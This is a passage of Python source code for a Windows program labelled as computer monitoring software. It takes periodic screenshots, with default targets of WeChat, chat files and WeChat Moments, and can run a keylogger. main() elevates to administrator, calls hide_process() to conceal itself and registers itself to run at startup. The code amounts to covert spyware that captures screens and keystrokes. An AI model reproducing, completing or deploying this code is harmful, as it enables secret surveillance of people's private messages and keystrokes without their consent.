    ``default_config`` is treated as read-only: ``config`` always receives
    a deep copy, so changing the live configuration never alters the
    defaults.
    """

    def __init__(self):
        self.config = None        # live configuration mapping, set by load()
        self.config_path = None   # path of config.json, set by load()
        self.default_config = {
            "white_list": ['微信', 'WeChat', '聊天文件', '朋友圈'],
            "save_path": "D:/doc/pcmon",
            "sleep_time": 5,
            "keylogger_enabled": False,
            "keylogger_respect_whitelist": True,
            "auto_start": False,
            "preferred_hotkey": "",
            "custom_hotkeys": [],
        }

    def _fresh_defaults(self):
        """Return an independent deep copy of ``default_config``."""
        import copy
        return copy.deepcopy(self.default_config)

    def load(self):
        """Read ``config/config.json`` under the application directory.

        A missing file is created from the defaults.  Keys missing from an
        existing file are filled in from the defaults and the file is
        rewritten.  If the file cannot be read or is not a JSON object, the
        defaults are used.

        Returns:
            The configuration mapping now stored in ``self.config``.
        """
        config_dir = os.path.join(get_app_path(), 'config')
        self.config_path = os.path.join(config_dir, 'config.json')
        os.makedirs(config_dir, exist_ok=True)

        if not os.path.exists(self.config_path):
            self._create_default_config()
            return self.config

        try:
            with open(self.config_path, 'r', encoding='utf-8') as f:
                config = json.load(f)
            if not isinstance(config, dict):
                raise ValueError("config.json must contain a JSON object")
            if not all(key in config for key in self.default_config):
                config = {**self._fresh_defaults(), **config}
                self._save_config(config)
            self.config = config
            return config
        except Exception as e:
            log_error(f"加载配置文件失败: {str(e)}")
            self.config = self._fresh_defaults()
            return self.config

    def _create_default_config(self):
        """Write the defaults to ``config_path`` and adopt a copy as ``config``."""
        try:
            with open(self.config_path, 'w', encoding='utf-8') as f:
                json.dump(self.default_config, f, ensure_ascii=False, indent=4)
            logging.info("已创建默认配置文件")
        except Exception as e:
            log_error(f"创建默认配置文件失败: {str(e)}")
        # Success or failure, run with an independent copy of the defaults.
        self.config = self._fresh_defaults()

    def _save_config(self, config):
        """Write ``config`` to ``config_path``.

        Returns:
            True on success, False when writing failed.
        """
        try:
            with open(self.config_path, 'w', encoding='utf-8') as f:
                json.dump(config, f, ensure_ascii=False, indent=4)
            return True
        except Exception as e:
            log_error(f"保存配置文件失败: {str(e)}")
            return False

    def save(self):
        """Persist ``self.config``; False when nothing is loaded or writing failed."""
        if self.config and self.config_path:
            return self._save_config(self.config)
        return False

    def set_preferred_hotkey(self, hotkey_name):
        """Store ``hotkey_name`` as ``preferred_hotkey`` and save the file.

        Returns:
            The result of ``save()``, or False when no configuration is loaded.
        """
        if self.config:
            self.config["preferred_hotkey"] = hotkey_name
            return self.save()
        return False
class ScreenshotManager:
    """Take queued screenshots on a background thread.

    Producers call ``add_task``; a daemon thread started by ``start``
    consumes the queue and saves each capture as a PNG file.
    """

    def __init__(self, save_path, interval):
        """Store the settings and create an empty task queue.

        Args:
            save_path: Base directory for screenshots.
            interval: Capture interval; stored but not used by this class.
        """
        self.save_path = save_path
        self.interval = interval
        self.task_queue = queue.Queue()
        self.running = False
        self.thread = None
        self.worker_thread = None
        self.MEMORY_OPTIMIZE_INTERVAL = 300

    def start(self):
        """Start the worker thread and create today's output directory.

        Returns:
            Always True.
        """
        logging.info("[截图管理] 启动截图管理器")
        self.running = True
        self.thread = threading.Thread(target=self._process_queue, daemon=True)
        self.thread.start()
        today = datetime.now().strftime('%Y-%m-%d')
        save_dir = os.path.join(self.save_path, today)
        os.makedirs(save_dir, exist_ok=True)
        logging.info(f"[截图管理] 截图管理器已启动,保存目录: {save_dir}")
        return True

    def stop(self):
        """Ask the worker thread to finish and wait up to two seconds for it."""
        logging.info("[截图管理] 停止截图管理器")
        self.running = False
        if self.thread and self.thread.is_alive():
            try:
                self.thread.join(timeout=2.0)
                logging.info("[截图管理] 截图处理线程已停止")
            except Exception as e:
                log_error(f"[截图管理] 停止截图处理线程失败: {str(e)}")
        logging.info("[截图管理] 截图管理器已停止")

    def add_task(self, window_title, save_dir):
        """Queue one screenshot to be saved in ``save_dir``.

        The file is named ``screenshot_<YYYYmmdd_HHMMSS>.png``.

        Returns:
            True when queued, False when preparing the task failed.
        """
        try:
            os.makedirs(save_dir, exist_ok=True)
            timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
            filename = f"screenshot_{timestamp}.png"
            filepath = os.path.join(save_dir, filename)
            self.task_queue.put((window_title, filepath))
            return True
        except Exception as e:
            log_error(f"[截图管理] 添加截图任务失败: {str(e)}")
            return False

    def _process_queue(self):
        """Worker loop: take tasks off the queue until ``running`` is cleared."""
        while self.running:
            try:
                # Waiting with a timeout replaces the empty()/get() pair and
                # still lets the loop notice ``running`` going False.
                window_title, filepath = self.task_queue.get(timeout=0.1)
            except queue.Empty:
                continue
            try:
                self._take_screenshot(window_title, filepath)
            except Exception as e:
                log_error(f"[截图管理] 处理截图队列出错: {str(e)}")
                time.sleep(0.5)
            finally:
                # Always balance the get(), so queue.join() cannot hang.
                self.task_queue.task_done()

    def _take_screenshot(self, window_title, filepath):
        """Grab the screen and save it to ``filepath``.

        ``IS_TAKING_SCREENSHOT`` is set for the duration, and the pressed
        key set is snapshotted before and after the capture.

        Returns:
            True when the image was saved, False on any error.
        """
        global IS_TAKING_SCREENSHOT, KEYBOARD_STATE_BEFORE_SCREENSHOT, KEYBOARD_STATE_AFTER_SCREENSHOT
        try:
            IS_TAKING_SCREENSHOT = True
            KEYBOARD_STATE_BEFORE_SCREENSHOT = set(GLOBAL_KEYS_PRESSED)

            save_dir = os.path.dirname(filepath)
            if save_dir:
                # A bare file name has no directory part to create.
                os.makedirs(save_dir, exist_ok=True)

            screenshot = ImageGrab.grab()
            screenshot.save(filepath)

            KEYBOARD_STATE_AFTER_SCREENSHOT = set(GLOBAL_KEYS_PRESSED)
            logging.info(f"[截图管理] 截图已保存: {filepath}, 窗口: {window_title}")
            return True
        except Exception as e:
            log_error(f"[截图管理] 截图失败: {str(e)}")
            return False
        finally:
            IS_TAKING_SCREENSHOT = False
def _start_system_hotkey_thread(timeout=2.0):
    """Register Ctrl+Alt+X on a hidden window owned by a message-pump thread.

    The window is created, the hot key registered and the messages pumped
    on the same thread, because a thread only receives messages for
    windows it created itself.

    Returns:
        The window handle when registration succeeded, otherwise None.
    """
    from ctypes import wintypes

    ready = threading.Event()
    state = {"hwnd": None}

    def pump():
        user32 = ctypes.windll.user32
        hwnd = None
        try:
            hwnd = win32gui.CreateWindow(
                "STATIC",
                None,
                win32con.WS_OVERLAPPED,
                0, 0, 0, 0,
                0,
                0,
                win32api.GetModuleHandle(None),
                None,
            )
            if hwnd and user32.RegisterHotKey(hwnd, 1, MOD_CONTROL | MOD_ALT, ord('X')):
                state["hwnd"] = hwnd
        except Exception as e:
            log_error(f"[备用热键] 消息循环异常: {str(e)}")
        finally:
            ready.set()

        if state["hwnd"] is None:
            # Registration failed: drop the unused window and end the thread.
            if hwnd:
                try:
                    win32gui.DestroyWindow(hwnd)
                except Exception as e:
                    logging.debug(f"DestroyWindow cleanup failed: {e}")
            return

        try:
            msg = wintypes.MSG()
            while not exit_event.is_set():
                # Drain everything queued for this thread, then idle briefly.
                while user32.PeekMessageW(ctypes.byref(msg), None, 0, 0, 1):
                    if msg.message == WM_HOTKEY:
                        logging.info("[备用热键] 检测到系统级热键")
                        handle_exit_hotkey()
                    user32.TranslateMessage(ctypes.byref(msg))
                    user32.DispatchMessageW(ctypes.byref(msg))
                time.sleep(0.1)
        except Exception as e:
            log_error(f"[备用热键] 消息循环异常: {str(e)}")
        finally:
            # Release the hot key and window on the thread that owns them.
            user32.UnregisterHotKey(hwnd, 1)
            try:
                win32gui.DestroyWindow(hwnd)
            except Exception as e:
                logging.debug(f"DestroyWindow cleanup failed: {e}")

    threading.Thread(target=pump, daemon=True).start()
    ready.wait(timeout)
    return state["hwnd"]


def create_backup_hotkey_listener():
    """Install a secondary way to exit the program.

    First tries a system-wide Ctrl+Alt+X hot key.  If that cannot be
    registered, falls back to a pynput listener that exits on Esc.

    Returns:
        The window handle of the hot-key window, or the fallback
        ``keyboard.Listener``, or None when both attempts failed.
    """
    try:
        hwnd = _start_system_hotkey_thread()
        if hwnd:
            logging.info("[备用热键] 系统级热键注册成功")
            return hwnd
        logging.warning("[备用热键] 系统级热键注册失败,尝试使用pynput备用")

        def on_press(key):
            try:
                if key == keyboard.Key.esc:
                    logging.info("[备用热键] 检测到ESC键")
                    handle_exit_hotkey()
                    return False
            except Exception as e:
                log_error(f"[备用热键] 处理按键异常: {str(e)}")

        backup_listener = keyboard.Listener(on_press=on_press)
        backup_listener.daemon = True
        backup_listener.start()
        logging.info("[备用热键] 使用pynput备用热键监听器")
        return backup_listener
    except Exception as e:
        log_error(f"[备用热键] 创建备用热键监听器失败: {str(e)}")
        return None
def main():
    """Program entry point: read settings, start every service, run the loop.

    Command-line values take precedence over ``config.json``.  In
    particular ``--save_path`` is no longer replaced by the configured
    path, and an explicit ``--sleep 5`` is honoured.  All started
    components are cleaned up in the ``finally`` block.
    """
    global SLEEP_TIME, white_list, KEYLOGGER_ENABLED, KEYLOGGER_RESPECT_WHITELIST, SAVE_PATH
    global MEMORY_OPTIMIZE_INTERVAL, IS_TAKING_SCREENSHOT
    global KEYBOARD_STATE_BEFORE_SCREENSHOT, KEYBOARD_STATE_AFTER_SCREENSHOT

    screenshot_manager = None
    hotkey_manager = None
    keyboard_listener = None
    backup_hotkey_hwnd = None
    try:
        parser = argparse.ArgumentParser(description="电脑监控程序")
        # default=None distinguishes "not given" from an explicit value.
        parser.add_argument("--sleep", type=int, default=None, help="截屏间隔时间 默认5秒")
        parser.add_argument("--save_path", type=str, default=None, help="图片文件存储地址")
        parser.add_argument("--white_list", type=str, default="", help="应用白名单 按,分割传入 默认为空")
        parser.add_argument("--keylog", action="store_true", help="启用键盘记录功能")
        args, _ = parser.parse_known_args()

        logging.info("电脑监控程序启动中...")
        config_manager = ConfigManager()
        config = config_manager.load()

        if args.save_path:
            SAVE_PATH = args.save_path
        else:
            SAVE_PATH = config.get(
                'save_path',
                os.path.join(os.path.dirname(os.path.abspath(__file__)), "data"),
            )
        os.makedirs(SAVE_PATH, exist_ok=True)
        setup_logging(SAVE_PATH)
        logging.info(f"日志系统初始化完成,保存路径: {SAVE_PATH}")

        if not is_admin():
            logging.warning("程序需要管理员权限才能正常运行")
            run_as_admin()
            sys.exit()

        SLEEP_TIME = args.sleep if args.sleep is not None else config.get('sleep_time', 5)

        # Check that the chosen directory is writable before relying on it.
        try:
            test_file = os.path.join(SAVE_PATH, "test_write.tmp")
            with open(test_file, 'w') as f:
                f.write("test")
            os.remove(test_file)
            if not args.save_path:
                config["save_path"] = SAVE_PATH
        except Exception as e:
            log_error(f"配置路径不可用: {str(e)}")
        logging.info(f"使用保存路径: {SAVE_PATH}")

        today = datetime.now().strftime('%Y-%m-%d')
        daily_dir = os.path.join(SAVE_PATH, today)
        os.makedirs(daily_dir, exist_ok=True)

        white_list = config.get('white_list', ['微信', 'WeChat', '聊天文件', '朋友圈'])
        if args.white_list:
            cli_titles = [t.strip() for t in args.white_list.split(",") if t.strip()]
            # dict.fromkeys removes duplicates while keeping a stable order.
            white_list = list(dict.fromkeys(cli_titles + white_list))
        config["white_list"] = white_list

        should_save_config = False
        if args.keylog:
            KEYLOGGER_ENABLED = True
            if not config.get('keylogger_enabled', False):
                config["keylogger_enabled"] = True
                should_save_config = True
                logging.info("通过命令行启用键盘记录,并保存到配置")
        else:
            KEYLOGGER_ENABLED = config.get('keylogger_enabled', False)
            logging.info(f"根据配置文件设置键盘记录状态: {KEYLOGGER_ENABLED}")
        KEYLOGGER_RESPECT_WHITELIST = config.get('keylogger_respect_whitelist', True)

        if should_save_config:
            config_manager.config = config
            if config_manager.save():
                logging.info("配置已更新并保存")
            else:
                logging.warning("配置保存失败")

        hide_process()

        hotkey_manager = HotkeyManager(config_manager)
        if not hotkey_manager.start():
            show_hotkey_conflict_message()
            sys.exit(1)
        backup_hotkey_hwnd = create_backup_hotkey_listener()

        show_startup_message(config, hotkey_manager)
        logging.info(f"截图服务启动 - 保存路径: {SAVE_PATH}, 间隔时间: {SLEEP_TIME}秒")
        logging.info(f"当前白名单: {white_list}")
        logging.info(f"键盘记录功能: {'已启用' if KEYLOGGER_ENABLED else '已禁用'}")
        logging.info(f"退出快捷键: {hotkey_manager.current_hotkey}")

        screenshot_manager = ScreenshotManager(SAVE_PATH, SLEEP_TIME)
        screenshot_manager.start()

        if KEYLOGGER_ENABLED:
            keyboard_listener = start_keylogger(SAVE_PATH, KEYLOGGER_RESPECT_WHITELIST)

        add_to_startup(config)
        run_main_loop(screenshot_manager)
    except KeyboardInterrupt:
        logging.info("程序被中断")
    except Exception as e:
        log_error(f"程序发生严重错误: {str(e)}", e)
    finally:
        cleanup_resources(screenshot_manager, hotkey_manager, keyboard_listener, backup_hotkey_hwnd)
if __name__ == "__main__":
    # Bootstrap logging next to this file until main() reconfigures it.
    log_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "pcmon.log")
    bootstrap_handlers = [
        logging.FileHandler(log_file, encoding="utf-8"),
        logging.StreamHandler(),
    ]
    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s - %(levelname)s - %(message)s",
        handlers=bootstrap_handlers,
    )
    logging.info("程序启动")

    try:
        # Start from a clean state: no pressed keys, no pending exit request.
        GLOBAL_KEYS_PRESSED.clear()
        exit_event.clear()
        main()
    except Exception as e:
        reason = str(e)
        log_error("程序启动失败", e)
        logging.critical(f"程序意外退出: {reason}")
        print(f"程序发生严重错误: {reason}")
        input("按任意键退出...")
        sys.exit(1)